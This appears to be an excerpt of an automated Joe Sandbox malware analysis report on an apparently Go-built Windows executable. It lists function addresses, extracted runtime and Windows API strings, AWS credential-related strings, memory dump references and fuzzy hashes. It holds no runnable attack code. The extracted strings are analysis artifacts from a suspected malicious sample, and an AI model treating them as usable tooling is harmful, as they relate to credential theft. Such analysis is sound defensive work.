              • nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaH, xrefs: 007C8A60
              • %, xrefs: 007C899C
              • mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBali, xrefs: 007C8A36
              • all goroutines are asleep - deadlock!cannot exec a shared library directlyvalue too large for defined data typetimezone hour outside of range [0,23]failed to load environment config, %vUnsubscribeServiceChangeNotificationsgodebug: unexpected IncNonDefault of 2, xrefs: 007C8993
              • checkdead: no m for timerunknown sigtramp callbackunexpected fault address missing stack in newstackbad status in shrinkstackmissing traceGCSweepStartresource deadlock avoidedoperation now in progressno buffer space availableno such device or addresssocket typ, xrefs: 007C892F
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBali$ nmidlelocked= needspinning=randinit twicestore64 failedmemprofileratesemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module dataruntime: seq1=runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many$ nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaH$%$all goroutines are asleep - deadlock!cannot exec a shared library directlyvalue too large for defined data typetimezone hour outside of range [0,23]failed to load environment config, %vUnsubscribeServiceChangeNotificationsgodebug: unexpected IncNonDefault of 2$checkdead: inconsistent countsrunqputslow: queue is not fullruntime: bad pointer in frame invalid pointer found on stack locals stack map entries for abi mismatch detected between runtime: impossible type kind unsafe.Slice: len out of rangestrings: negative Re$checkdead: no m for timerunknown sigtramp callbackunexpected fault address missing stack in newstackbad status in shrinkstackmissing traceGCSweepStartresource deadlock avoidedoperation now in progressno buffer space availableno such device or addresssocket typ$checkdead: no p for timercheckdead: no m for timerunknown sigtramp callbackunexpected fault address missing stack in newstackbad status in shrinkstackmissing traceGCSweepStartresource deadlock avoidedoperation now in progressno buffer space availableno such de$no goroutines (main called runtime.Goexit) - deadlock!goroutine running on other thread; stack unavailableclient partition does not match provided ARN partitiontls: server resumed a session with a different versiontls: server accepted 0-RTT with the wrong ci$runtime: checkdead: nmidle=runtime: checkdead: find g runlock of unlocked rwmutexsigsend: inconsistent statemakeslice: len out of rangemakeslice: cap out of rangegrowslice: len out of rangestack size not a power of 2too many callback functionstimer when must b
              • API String ID: 0-378851391
              • Opcode ID: d58b26f498bf82fb47c3eaadf9dcf2bc0d3e8a20bc6cd84a7212751765bedbfc
              • Instruction ID: 5828e1cda80625e955c18e50d1b8b70384b3af20fe5173da33108fbb0c1899ad
              • Opcode Fuzzy Hash: d58b26f498bf82fb47c3eaadf9dcf2bc0d3e8a20bc6cd84a7212751765bedbfc
              • Instruction Fuzzy Hash: 01A127B4509304DFC750EF64E085BAEBBE4BB89304F44882DE88997352EB38E944DB53
              Function 00787540 Relevance: 12.7, Strings: 10, Instructions: 199COMMON
              Download Yara Rule
              Strings
              • : missing method notetsleepg on g0bad TinySizeClasskey align too bigruntime: pointer g already scannedmark - bad statusscanobject n == 0swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb, xrefs: 007877FB
              • (types from different packages)GCProg for type that isn't largeruntime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremo, xrefs: 0078773C
              • is LEAFbase of ) = <==GOGC] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfunc, xrefs: 00787625
              • , not next= jobs= goid sweep B -> % util alloc free span= prev= list=, i = code= addr= m->p= p->m=SCHED curg= ctxt: min= max= (...) m=nil base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-regionBu, xrefs: 0078763F
              • (types from different scopes)notetsleep - waitm out of syncfailed to get system page sizeassignment to entry in nil mapruntime: found in object at *( in prepareForSweep; sweepgen /cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sched/pauses/total/, xrefs: 00787774
              • interface ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = , tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=, xrefs: 00787570
              • , xrefs: 00787746
              • is not pointerBAD RANK status unknown(trigger= npages= nalloc= nfreed=runtime.[signal reflect. newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Mo, xrefs: 007877D9
              • is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: , xrefs: 00787887
              • interface conversion: freeIndex is not validoldoverflow is not nils.freeindex > s.nelemsbad sweepgen in refillspan has no free space/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex over, xrefs: 00787603, 007877BF, 00787865
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: $ (types from different packages)GCProg for type that isn't largeruntime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremo$ (types from different scopes)notetsleep - waitm out of syncfailed to get system page sizeassignment to entry in nil mapruntime: found in object at *( in prepareForSweep; sweepgen /cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sched/pauses/total/$ is LEAFbase of ) = <==GOGC] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfunc$ is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: $ is not pointerBAD RANK status unknown(trigger= npages= nalloc= nfreed=runtime.[signal reflect. newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Mo$, not next= jobs= goid sweep B -> % util alloc free span= prev= list=, i = code= addr= m->p= p->m=SCHED curg= ctxt: min= max= (...) m=nil base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-regionBu$: missing method notetsleepg on g0bad TinySizeClasskey align too bigruntime: pointer g already scannedmark - bad statusscanobject n == 0swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb$interface conversion: freeIndex is not validoldoverflow is not nils.freeindex > s.nelemsbad sweepgen in refillspan has no free space/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex over$interface ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = , tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=
              • API String ID: 0-1465602642
              • Opcode ID: f36f36cd0b4e01176f9f4989f651506caef22489b69d128ace1dafe7e71a81cb
              • Instruction ID: 7429020454b1235b9ff1b603bf045405ad5ad67d04d54bb020b69297730628e6
              • Opcode Fuzzy Hash: f36f36cd0b4e01176f9f4989f651506caef22489b69d128ace1dafe7e71a81cb
              • Instruction Fuzzy Hash: D4A189B8508341DFD358DF29D090A5ABBF1BB88700F50892EE8D987361DB79E948CF52
              Function 007E2740 Relevance: 12.7, Strings: 10, Instructions: 175COMMON
              Download Yara Rule
              Strings
              • - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDl, xrefs: 007E29D8
              • not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCreateDirectoryWFlushFileBuffersGetComputerNameWGetFullPathNameWGetL, xrefs: 007E28A7
              • base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-regionBucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTa, xrefs: 007E287D
              • runtime: type offset out of rangetoo many levels of symbolic linksInitializeProcThreadAttributeListAWS_EC2_METADATA_SERVICE_ENDPOINTSharedConfigProfileNotExistsErrorfailed to unmarshal error messageCryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPo, xrefs: 007E2A0C
              • !, xrefs: 007E2A15
              • etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeor, xrefs: 007E291C
              • runtime: type offset base pointer out of rangeruntime: text offset base pointer out of rangeTime.UnmarshalJSON: input is not a JSON stringfailed to find credentials in the environment.reflect: nil type passed to Type.ConvertibleToPSSWithSHA256PSSWithSHA384PSSW, xrefs: 007E2962
              • out of range no module dataruntime: seq1=runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMessageWGetConso, xrefs: 007E29AE
              • runtime: typeOff runtime: textOff permission deniedwrong medium typeno data availableexec format errorLookupAccountSidWDnsRecordListFreeGetCurrentProcessGetShortPathNameWWSAEnumProtocolsWGTB Standard TimeFLE Standard TimeGMT Standard Timefractional secondCanSe, xrefs: 007E2854, 007E2985
              • types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamS, xrefs: 007E28F2
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamS$ - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDl$ base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-regionBucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTa$ etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeor$ not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCreateDirectoryWFlushFileBuffersGetComputerNameWGetFullPathNameWGetL$ out of range no module dataruntime: seq1=runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMessageWGetConso$!$runtime: type offset base pointer out of rangeruntime: text offset base pointer out of rangeTime.UnmarshalJSON: input is not a JSON stringfailed to find credentials in the environment.reflect: nil type passed to Type.ConvertibleToPSSWithSHA256PSSWithSHA384PSSW$runtime: type offset out of rangetoo many levels of symbolic linksInitializeProcThreadAttributeListAWS_EC2_METADATA_SERVICE_ENDPOINTSharedConfigProfileNotExistsErrorfailed to unmarshal error messageCryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPo$runtime: typeOff runtime: textOff permission deniedwrong medium typeno data availableexec format errorLookupAccountSidWDnsRecordListFreeGetCurrentProcessGetShortPathNameWWSAEnumProtocolsWGTB Standard TimeFLE Standard TimeGMT Standard Timefractional secondCanSe
              • API String ID: 0-3914258382
              • Opcode ID: d1a799c6b83336bbd2409d6b4e79abf98fdc2db0856b55ccc7ac1feb4097e2d5
              • Instruction ID: 2488ccdf3f46fae26ad903a9feefa416631f2c8b07895e227230495d9c37f1e6
              • Opcode Fuzzy Hash: d1a799c6b83336bbd2409d6b4e79abf98fdc2db0856b55ccc7ac1feb4097e2d5
              • Instruction Fuzzy Hash: 3181F2B450A345DFD344EF64D589B9EBBE4FB89304F40892DE48887312E738A989DB52
              Function 007E2490 Relevance: 12.7, Strings: 10, Instructions: 156COMMON
              Download Yara Rule
              Strings
              • - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDl, xrefs: 007E26E7
              • not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCreateDirectoryWFlushFileBuffersGetComputerNameWGetFullPathNameWGetL, xrefs: 007E25B2
              • base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-regionBucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTa, xrefs: 007E2588
              • runtime: name offset base pointer out of rangeruntime: type offset base pointer out of rangeruntime: text offset base pointer out of rangeTime.UnmarshalJSON: input is not a JSON stringfailed to find credentials in the environment.reflect: nil type passed to Ty, xrefs: 007E2671
              • runtime: nameOff runtime: typeOff runtime: textOff permission deniedwrong medium typeno data availableexec format errorLookupAccountSidWDnsRecordListFreeGetCurrentProcessGetShortPathNameWWSAEnumProtocolsWGTB Standard TimeFLE Standard TimeGMT Standard Timefract, xrefs: 007E255F, 007E2694
              • runtime: name offset out of rangeruntime: type offset out of rangetoo many levels of symbolic linksInitializeProcThreadAttributeListAWS_EC2_METADATA_SERVICE_ENDPOINTSharedConfigProfileNotExistsErrorfailed to unmarshal error messageCryptAcquireCertificatePrivat, xrefs: 007E271B
              • !, xrefs: 007E2724
              • etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeor, xrefs: 007E262B
              • out of range no module dataruntime: seq1=runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMessageWGetConso, xrefs: 007E26BD
              • types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamS, xrefs: 007E2601
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
